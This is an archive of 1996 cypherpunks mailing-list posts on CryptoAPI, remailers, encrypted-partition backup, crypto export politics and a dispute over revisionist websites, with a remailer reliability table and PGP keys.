Technical Surveillance CounterMeasures  (TSCM)
Forensic Audio Restoration & Audio Tape Enhancement  

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7.1

mQCNAzDgc7MAAAEEAK1gzGapvWKn287T8QPYphpIzF6+uHAyf/shVPbrGD/f5v8i
sgMOSC5x05w9xyijpzx2ua5i4eXXzjiq257y7oJy60TEFWRHYqGJtZRpqlh9DKjD
0EA5dVitmEgKNot3rmcF9amBxUP2RwIq2nzHfgiLGB3obqeKYp0MXw7qZrH7AAUR
tB5TcHlLaW5nIDxzcHlraW5nQG5vdmFsaW5rLmNvbT4==UBv6

-----END PGP PUBLIC KEY BLOCK----- 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 18 Mar 1996 08:12:18 +0800
To: bglassle@kaiwan.com
Subject: Re: M$ CryptoAPI Question
In-Reply-To: <314bb878.2839245@kaiwan.kaiwan.com>
Message-ID: <199603172343.SAA26113@homeport.org>
MIME-Version: 1.0
Content-Type: text


Bob Glassley wrote:

| With the current releases of the NT 4.0 betas, I would assume some of
| you have had the chance to look at the API more closely.  I am getting
| ready to hack my first crypto enabled app and wondered if this was
| worth using or if Crypto C++ is the way to go.

	MS's crypto API is only available on MS platforms (AFAIK.)  If
you want to be able to run cross platform, I'd reccomend something
that works on other platforms.  Crypto++ is probably preferable to
MS's API for that reason.

	For other options, I maintain a table of crypto libraries at
www.homeport.org/~adam/crypto/

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@atropos.c2.org
Date: Wed, 20 Mar 1996 05:01:25 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
In-Reply-To: <Pine.ULT.3.91.960317144453.4282B-100000@Networking.Stanford.EDU>
Message-ID: <199603180447.UAA25170@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Said political opponent is now being serviced by an ISP that
will not kick him off because of threats from revisionists.

> In other news, Holocaust Revisionist mgiwer@combase.com (Matt Giwer) has
> been *openly bragging* about getting a political opponent kicked off of a
> conservative Texas ISP. The main difference between the French and Texas
> cases being that the information on Rack Jite's web pages was true, and
> the information on the Holocaust Revisionist sites is not. I guess that's
> not important, though, since by definition, Political Correctness only
> targets the right. 
> 
> -rich
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 20 Mar 1996 04:43:25 +0800
To: cypherpunks@toad.com
Subject: Re: M$ CryptoAPI Question
Message-ID: <199603180605.WAA22290@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:27 PM 3/17/96 EST, Dr. Dimitri Vulis wrote:
> I wonder if it's worth it to crack their approval mechanism so we can
> add our own crypto subsystems without asking Microsoft's approval.

Wait.

Wait for some apps to come out that use Microsofts crypto.

Wait until Microsoft makes some oppressive decisions, 
or is compelled to make some oppressive decisions.]

I do not expect that any cracking will be needed.  Microsoft 
will approve a freeware module for use in America, and then, 
alas alas, someone will leak it.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 20 Mar 1996 04:49:06 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
Message-ID: <199603180605.WAA22293@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:30 PM 3/17/96 -0800, Rich Graves wrote:
> In other news, Holocaust Revisionist mgiwer@combase.com (Matt Giwer) has
> been *openly bragging* about getting a political opponent kicked off of a
> conservative Texas ISP. The main difference between the French and Texas
> cases being that the information on Rack Jite's web pages was true, and
> the information on the Holocaust Revisionist sites is not. I guess that's
> not important, though, since by definition, Political Correctness only
> targets the right. 

Jack Rite was kicked off for gross and repeated violations of 
netiquette, not for his political views.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Wed, 20 Mar 1996 08:39:52 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9603180708.AA18907@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
**** Address already subscribed to cypherpunks
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 18 Mar 1996 22:22:01 +0800
To: cypherpunks@toad.com
Subject: Would the FTC crack down on snake oil someday?
Message-ID: <199603180455.XAA12434@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Enclosed is an excerpt from Edupage. Snake-oil crypto popped into my 
mind.... I wonder if the FTC (Federal Trade Commission... agency 
*meant* to crack down on consumer fraud, for non-US readers here) 
would ever get into act here.

Does the FTC have a home page? (Guess I'll do a search...)


------- Forwarded Message Follows -------

*****************************************************************
Edupage, 17 March 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

TOP STORIES
        FTC Targets Internet Fraud
[..]
FTC TARGETS INTERNET FRAUD
The Federal Trade Commission is conducting a "wholesale crackdown" on
perpetrators of allegedly deceptive marketing schemes that are advertised in
Internet news groups or on the World Wide Web.  Charges were filed against
nine individuals or companies accused of misleading the public, and agency
officials say this is only the beginning:  "The Internet opens a world of
opportunities for consumers.  Unfortunately, it also presents opportunities
for scam artists.  We intend to monitor the Internet rigorously and act
decisively when we see deceptive and misleading marketing," says the
director of the FTC's Bureau of Consumer Protection.  (Investor's Business
Daily 15 Mar 96 A4)
[..]
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 20 Mar 1996 09:37:32 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
In-Reply-To: <199603180605.WAA22293@dns1.noc.best.net>
Message-ID: <Pine.ULT.3.91.960317233804.4724E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Mar 1996 jamesd@echeque.com wrote:

> At 04:30 PM 3/17/96 -0800, Rich Graves wrote:
> > In other news, Holocaust Revisionist mgiwer@combase.com (Matt Giwer) has
> > been *openly bragging* about getting a political opponent kicked off of a
> > conservative Texas ISP. The main difference between the French and Texas
> > cases being that the information on Rack Jite's web pages was true, and
> > the information on the Holocaust Revisionist sites is not. I guess that's
> > not important, though, since by definition, Political Correctness only
> > targets the right. 
> 
> Jack Rite was kicked off for gross and repeated violations of 
> netiquette, not for his political views.

That's a new one.

Giwer is bragging that he got him kicked off for either a) copyright
violations (two GIFs of Giwer, taken from Giwer's web site) or b) libel
(no details given, and difficult to prove because truth is an ironclad 
defense against a libel suit). 

The Volant Turnpike system administrators said the problem was that a few
instances of the word "FUCK" violated the Communications Decency Act. I've
seen their mail. Their reasons for deleting the files after all naughty
words and "copyright violations" were deleted were not stated. 

I'd be curious to know how a web site can pose "netiquette" problems. Jack
Rite never sent or received email or news from turnpike.net;  he only used
their web-hosting services. 

Anyway, I don't know much about this case, and the guy is a little kooky,
agreed, but far less kooky than Giwer. We're all friends here. It just
pisses me off to see Giwer claiming to represent the "libertarian" 
position, and occasionally being taken seriously by people I otherwise
respect, when he's really just a racist kook. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 18 Mar 1996 16:30:19 +0800
To: cypherpunks@toad.com
Subject: Re: M$ CryptoAPI Question
In-Reply-To: <199603180605.WAA22290@dns1.noc.best.net>
Message-ID: <Pine.ULT.3.91.960317235407.4724F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Mar 1996 jamesd@echeque.com wrote:

> At 06:27 PM 3/17/96 EST, Dr. Dimitri Vulis wrote:
> > I wonder if it's worth it to crack their approval mechanism so we can
> > add our own crypto subsystems without asking Microsoft's approval.
[...]
> Wait until Microsoft makes some oppressive decisions, 
> or is compelled to make some oppressive decisions.]
> 
> I do not expect that any cracking will be needed.  Microsoft 
> will approve a freeware module for use in America, and then, 
> alas alas, someone will leak it.

If the only goal is to allow international strong crypto using the
CryptoAPI, then I agree with the above. However, exploring the CryptoAPI
internals now, while there is still a possibility that they can be
changed, is a productive undertaking to the extent that it exposes holes. 

If the good guys can find a way to plug an unapproved international
strong-crypto module into the CryptoAPI, then the bad guys can find a way
plug in a no-crypto virus or trojan horse. 

-rich@c2.org
 http://www.c2.org/hackmsoft/ and other cool stuff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Mon, 18 Mar 1996 23:10:29 +0800
To: cypherpunks@toad.com
Subject: RE: Tim's friend's mildly retarded son
In-Reply-To: <ad6f75c41302100402cd@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960317212249.24533A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Mar 1996, Timothy C. May wrote:

> As to Asgaard and his claim that the FDA is to be trusted, he is welcome to
> trust them. I don't think they are _dishonest_, merely in thrall (*) to
> special interests, drug companies, and, above all, to bureaucratic
> stodginess.

I could write an answer to this (about that I only said to trust FDA
until there exists an alternative web of trust and reputations in the
pharmaceutical business; that truly diseased people are not in the mood
for researching the competence of a 'doctor' or 'healer' but are happy
that entering a clinic guarantees that the guy examining them is a
physician authorized by a non-profit entity of long-standing integrity
and not a comlete quack; that the physicians, who are bombarded with
manipulated information from the multinational drug companies would be
at a great loss without independent trustable second opinions; and
about how it would take quite some time to build up an alternative,
private structure without bureaucratic stodginess - and even about
the hypothesis that basic medical care might be counted together with
justice and national defence as best paid for by involuntary taxes
in the best compromise for total anarcho-capitalism that we might see
in our lifetimes) but I won't :-) because of the off-topicness of the
topic.

> (* Asgaard should be happy that I am using a word derived from Old Norse,
> "thrall," as in "enthralling." A thrall was a slave in Icelandic and Old
> Norse.)

The substantive 'tral' (with double dots over the a) and even more the 
verb 'trala' are used in current Swedish. I commend your versatile and
exact use of the American-English language. Your posts are always a
pleasure to read (and learn from, for a reader with another native
tounge).

> His speculation that my friend's mildly retarded son is not helped is
> unknowable to him. In fact, the nootropic in question, Piracetam, is sold
> in Europe (and Mexico, as I noted), and elsewhere, for the treatment of
> Alzheimer's, dementia, and to alleviate mild retardation. My friend thinks

For a good (in my opinion) review on nootropics, see:

http://www.damicon.fi/sd/nsa-sd-article.html

(courtesy of Alta Vista)

For comparison, Sweden has around 2,000+ prescription drugs. Germany
has 20,000+. This doesn't mean that Germans are healthier.
 
> Whether my friend is deluding himself or not, it is not for men with guns
> to tell him he may not buy something to consume. The "drug laws" are
> nothing more than "dietary laws," and have virtually nothing to do with
> public or personal safety. If safety was the issue, then the drug ethanol,
> which kills at least 40,000 Americans a year would  be outlawed while

That's another issue. One problem is that the overall mortality is 100%,
in the end. The long-term side effects of alcohol and tobacco are not that
bad compared to many potent pharmaceuticals that FDA approves of, for
cautious use in diseased persons, after risk/benefit analysis (morphin,
cytostatics, immuno-suppressives).

The political question, if a (healthy) individual has the right to use
(recreational) drugs of his choice, really isn't centered around
safety. Even if there was a completely harmless opioid, central
stimulant or psychedelic drug available, strong forces would act
against legalization out of moral or religious convictions ('God
created man to suffer, so we shall suffer').

> winner. (The statistics I saw a few years ago were easily memorizable:
> tobacco: 400,000, alchohol: 40,000, drugs: 4,000.)

These figures would look a bit different if 200,OOO,OOO Americans
regularly used crack or heroin.

> We are not free when someone tells us which foods and herbs are legal to
> eat, and which are not.

I generally agree. But I have a slight problem with the concept of
Death Pills (f ex cyankalium) sold in any store, under various brand
names, for better profits: Instant Nirvana, God's Face, Bye Bye Bella,
Moon's Reincarnation.

In these days of designer drugs, the consumer would have a lot to gain
if FDA (or a private entity with a similar reputation) approved new
recreational drugs before they entered the market, avoiding tragedies
like the Parkinson epidemic (in California, wasn't it?) caused by
MTPT.


Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 18 Mar 1996 18:47:53 +0800
To: cypherpunks@toad.com
Subject: Re: Backup of Encrypted Partition
In-Reply-To: <199603172221.OAA14725@squirrel.com>
Message-ID: <199603180230.DAA14930@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Mark C. Henderson (mch@squirrel.com) wrote:
: On Mar 17, 18:38, Sanwar Ali wrote:
: } Subject: Backup of Encrypted Partition
: } Hi
: } 
: } Apologies if this is too much of a beginner's Q.
: } 
: } Does anyone know how to backup a "SecureDrive" partition onto tape 
: } quickly and easily.
: } 
: } HPACK is really slow.
: } 
: } PKZIP and then PGP is slow.
: } 
: } RAWDISK, seems to be quite complex (perhaps I am just stupid!), and I 
: } am terrified of making some sort of terrible mistake.
: } 
: } I have about 100MB in the partition.  I have a pretty out of date 
: } computer which is a 386 33MHz running Windows.
: 
: 
: Ease of backup is one of the strengths of CFS which is a cryptographic
: filesystem for various flavours of UNIX and Linux.


If you have Linux installed, you can backup your dos securedrive partition
by doing

cat /dev/hda2 >/dev/ftape
         ^^^^
         (or whatever your securedrive partition is)


No decrypting necessary.  If the partition is only 100MB then it ought to 
fit on a standard qic-80 tape.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Mon, 18 Mar 1996 18:46:24 +0800
To: cypherpunks@toad.com
Subject: Re: The all.net controversy continues
In-Reply-To: <Pine.SCO.3.91.960315101330.22528A-100000@grctechs.va.grci.com>
Message-ID: <Pine.HPP.3.91.960318034316.24533D-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Mar 1996, Mark Aldrich wrote:

> If all.net's policy is really "nobody's allowed to telnet in," they why 
> don't they just shutdown the damn telnetd, and be done with it?  Or, if 
> they want only "authorized" personnel, why not add sufficient crypto to 
> secure the channel?

Yes, it's a mystery. Especially since the sysadmin, Dr. F. Cohen,
repeatedly assured this list, half a year ago, that his sites
were the only impenetrable ones in the internet universe, so
he should only have to sit laughing at these attacks.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Mar 1996 19:35:40 +0800
To: cypherpunks@toad.com
Subject: Re: Would the FTC crack down on snake oil someday?
Message-ID: <2.2.32.19960318111412.00d6ec40@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 PM 3/17/96 +0000, Deranged Mutant wrote:

>FTC TARGETS INTERNET FRAUD
>The Federal Trade Commission is conducting a "wholesale crackdown" on
>perpetrators of allegedly deceptive marketing schemes that are advertised in
>Internet news groups or on the World Wide Web.  Charges were filed against
>nine individuals or companies accused of misleading the public

Nine down and 100,000 to go.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 20 Mar 1996 03:17:10 +0800
To: cypherpunks@toad.com
Subject: Commercial crypto in Zurich
Message-ID: <199603181434.GAA02128@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got back from doing some consulting in Europe.  In the Zurich airport,
there was a large illuminated sign (near the business class lounges) that
proclaimed:

Reliable cipher systems for absolute telecom protection

TST 7790
Secure telephone, sat phone, ISDN

TST 5573 F/U
Fax ciphering

TST 5573C
Data ciphering with 10 EXP 80 Key

TST 4045
HF SSB krypto modem

TST 8010
Spread spectrum transceiver

TST
TeleSecurity Timmann
Timman Gmbh
Lutzing, Germany

Full color photos of all of the above products were displayed.

No technical details on the cryptosystems being used, but quite refreshing,
considering the current state of things in the good old US of A...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 20 Mar 1996 14:09:55 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199603181450.GAA09196@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono nymrod)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 18 Mar 96 6:46:10 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    cpunk@remail.ecafe.org           ##-++#######     3:40 100.00%
alpha    alias@alpha.c2.org               ++++++++++++    50:30  99.99%
exon     remailer@remailer.nl.com         *-*++--++***    18:54  99.99%
portal   hfinney@shell.portal.com         ##-**#*#-**#    11:12  99.99%
haystack haystack@holy.cow.net            +#-+-**##**#     6:30  99.99%
pamphlet pamphlet@idiom.com               --+-------++  5:49:56  99.98%
nymrod   nymrod@nym.alias.net             **-++*****+*     8:47  99.98%
flame    remailer@flame.alias.net         -----------+  4:03:33  99.97%
hacktic  remailer@utopia.hacktic.nl       **-++*******    13:46  99.97%
replay   remailer@replay.com              **-++***+***    10:42  99.97%
mix      mixmaster@remail.obscura.com     . - *--...+- 21:59:57  99.97%
c2       remail@c2.org                    -+*++++-++++    44:35  99.96%
tjava    remailer@tjava.com               ###++#######     1:08  99.96%
vishnu   mixmaster@vishnu.alias.net       **--+*+*--++    53:01  99.94%
nemesis  remailer@meaning.com             -+-+ **+****    36:11  99.86%
gondolin mix@remail.gondolin.org          .__.-----.-   9:38:20  99.66%
gondonym alias@nym.gondolin.org           .__.-----..   9:42:41  99.63%
extropia remail@extropia.wimsey.com       .-.-+-+----  11:49:50  99.57%
shinobi  remailer@shinobi.alias.net       **#++##-+#++     6:52  99.53%
lead     mix@zifi.genetics.utah.edu       ++  ++ +*+++    35:26  99.39%
vegas    remailer@vegas.gateway.com       ** +-- * ***    15:07  99.36%
alumni   hal@alumni.caltech.edu           ** ++# *-+##  1:34:05  98.76%
amnesia  amnesia@chardos.connix.com             +---    2:30:51  97.82%
treehole remailer@mockingbird.alias.net    ----  -++-+  2:50:06  96.47%
penet    anon@anon.penet.fi               _-._.. _..   38:20:41  95.24%
spook    remailer@spook.alias.net          **-+-**-  +    46:36  93.05%
ncognito ncognito@gate.net                        ##*      1:21  87.38%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 19 Mar 1996 03:21:10 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
Message-ID: <199603181555.HAA23928@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:07 PM 3/18/96 +0100, Anonymous wrote:
> I was surprised - the authors of these [revisionist] sites come across 
> as very sane and open-minded, not the foaming at the mouth bigoted 
> types that others lead us to believe.
>
> Anyone who seriously calls him(her)self open-minded should give these
> sites a go - they certainly got me thinking.

The pernicious effects of censorship:  When you actually meet monsters,
and see that they do not have horns and a tail, you falsely imagine 
that they are not monsters.

You will read: "So and so went to site of the alleged extermination
centers, and he saw X, Y, and Z, and this shows there are holes in
the extermination story.

Simple lie.

Whenever I write about Cuba, leftists write:  "I went to Cuba, 
and I saw such and such so and so".  Well I went to Cuba, and 
I know that they lie barefaced, therefore I assume the same is
true of the flatly conflicting tales concerning the holocaust.

Those who defend totalitarianism, regardless of the brand name of 
totalitarianism, simply lie.  It is as uncomplicated as that.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Tue, 19 Mar 1996 04:17:49 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: M$ CryptoAPI Question
Message-ID: <199603181624.IAA24559@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 AM 3/18/96 -0800, you wrote:
>
>If the good guys can find a way to plug an unapproved international
>strong-crypto module into the CryptoAPI, then the bad guys can find a way
>plug in a no-crypto virus or trojan horse. 
>

You want to prove:
(A)
IF you CAN plug in an unapproved module
THEN you CAN plug in a trojan/virus.

That doesn't mean, however, that:
(B)
IF you can't plug in an unapproved module
THEN you can't plug in a trojan/virus.

The subversion mechanisms would just not use the standard API.  
So what have you really proved if you can prove (A)?

>-rich@c2.org
> http://www.c2.org/hackmsoft/ and other cool stuff
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Mon, 18 Mar 1996 21:59:33 +0800
To: cypherpunks@toad.com
Subject: reputation capital transaction
Message-ID: <96Mar18.083034edt.10023@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
In anticipation of the upcoming Computers, Freedom and Privacy conference,
I'd like to transfer some reputation capital between accounts.
 
	Doug Sinclair <diemos@io.org> == The Cunning Artificers
 
I ported RC4 to the HP48 calculator.  A bignum package capable of RSA and 
Diffie-Hellman is coming soon.
 
Doug's key:
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
 
mQCNAy93adEAAAEEAPHAXq0g2lFnn1kE4trrPWCjhiCzxNkjake4W4mspvOCGjd0
MUREgYJm3DVcTn5Ue0FdhSHOVoMoS+jdRV8W6wB/hGUUqyqleKkNSv1/yOAPCzHn
Iq74GCRniy0WdO5zlDi56LxH5ruteWl6soPt1n3EeJKRldux7DouNsrtqO6VAAUR
tB1Eb3VnIFNpbmNsYWlyIDxkaWVtb3NAaW8ub3JnPokAlQMFEDFNZAjhTVXsPaAX
/QEBzZED/icJDAo1cjVp0eRqpelcAurXFqlkcfbvyg76KDHsxsiKthLyzF9UwErE
xDxMyG/4rhojiJUoVaIq3MgJ9ZwtpXwkLS0kqXZySPSLsWMXjpzy36tOZ2XcdVFv
kVVUy3I0M2nYfO8vT4vZV53VC8vqAKTjuQCt/vhcDrYTZdX0BLLY
=t2MG
- -----END PGP PUBLIC KEY BLOCK-----
 
The Cunning Artificers key:
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
 
mQCNAzEAEf4AAAEEAMONoLHj5CwKvaM6ch9GOcUjgoVS5sjXa4TzD2ohhtHFYR9l
QzNj0vNASBQKE/Mk9Flqg+dtitS7S7B0qZQ+mQmMT73yniun596jt1NCJ5sLBKrM
jDvYK3wGbycVX43RBiR3iwJZGq5blfWqNRE7kFdTxgu+bCdtLOFNVew9oBf9AAUR
tBZUaGUgQ3VubmluZyBBcnRpZmljZXJz
=pf3Y
- -----END PGP PUBLIC KEY BLOCK-----
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMU1k8uFNVew9oBf9AQG/JQP+K0hNzQew5MBOc1TGea+gkvBrTy+O801j
0yb4OrmAfuEQg6TalE7+jKGPoB/y9Ln2eusaZ+JCneBs7oVdvPSlzm/qNOjYXB7m
jSxjkp20lzhxU5UBSAWWePbYsvoCe78BFS51OXEZdTuvGnbcKyh8l1DbvEKEML0i
rNzbhRCuMDE=
=HOSH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Mon, 18 Mar 1996 22:11:19 +0800
To: cypherpunks@toad.com
Subject: While browsing the IRS ("Electronic Certification")
Message-ID: <Pine.BSI.3.91.960318084035.337A-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


While poking around at www.ustreas.gov, I found the following:

